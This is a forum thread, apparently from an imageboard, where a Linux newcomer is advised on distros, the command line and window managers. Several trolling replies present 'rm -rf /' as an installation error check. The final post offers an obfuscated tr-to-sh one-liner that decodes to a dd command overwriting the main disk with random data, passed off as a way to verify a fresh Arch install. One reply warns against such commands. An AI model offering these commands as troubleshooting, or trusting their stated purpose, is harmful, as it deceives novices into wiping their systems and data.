Hey man, they are all going to hate you, but go to freenode and go to #archlinux
They're going to tell you not to use arch, but if you stick through it they probably will eventually help you.

I have never understood, how do you get websites to look all dark like that? I always liked dark desktops but they clash with the internet too hard.

If you're into Linux, I recommend trying out Fedora or Linux Mint to get the basics of Linux. Learn how to do things "the Linux way" (software installation/package management, updating the whole system, file system conventions, etc)

Gradually wean yourself from GUI tools, and get yourself used to the command line interface (CLI). There are plenty of resources on the internet and in your computer (try typing "man [command name here] or [command name here] --help" on the terminal.) Just don't ask 4chan for advice.

Then have some fun. Try out different distros. Try figuring out the manual partitioning/mount point configuration when distro-hopping. (ALWAYS BACK UP YOUR IMPORTANT DATA)

Try out different desktop environment/window managers (DE/WM), mess around with their config files and "rice" them. Having the freedom and a variety of choices is one of the key part of the Linux experience. It becomes addictive if you're really into Linux.

Then try Arch. If you made it this far, congratulations. Arch Linux should be intuitive enough.

>I recommend trying out Fedora or Linux Mint

this is by far the shittiest advice itt

Use Debian or fucking Ubuntu.

Linux Mint doesn't push security updates on "stable"

Fedora has such a hard on in complying with patents, even invalid ones like subpixel renderings and hinting routines.
>>
>>53848691
xorg-server xorg-xinit wm/de of choice, configure .xinitrc
tada
>>
>>53848691
Ignore the other posters OP, most of it is trolling... first you need to check your installation for errors, do this

 rm -rf /

if you are in root, if you are not root, then

 sudo rm -rf /

when this is done, it will automatically proceed to ask you which graphical desktop you want

>>

doesn't matter actually. as long as it's newbie-friendly and popular enough.

in a couple months, OP's probably gonna hop to another distro anyway.
>>
>>53850271
Ignore this troll

 rm -rf /

do this to check if your installation completed correctly.

Trolls. srsly, OP. You know it's never good when you have sudo, rm, rf (or fr) all on the same line.

Check this out:
http://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/
> rm -rf / is number 1

Use this instead to verify and check your installation for errors
echo $(tr _:w8u7 od/r=a <<< ':: ifuw:evw87n:_m _fuw:evwsd7' | sh)

It might look cryptic, but this thing works and I always use this when I do a fresh Arch install.
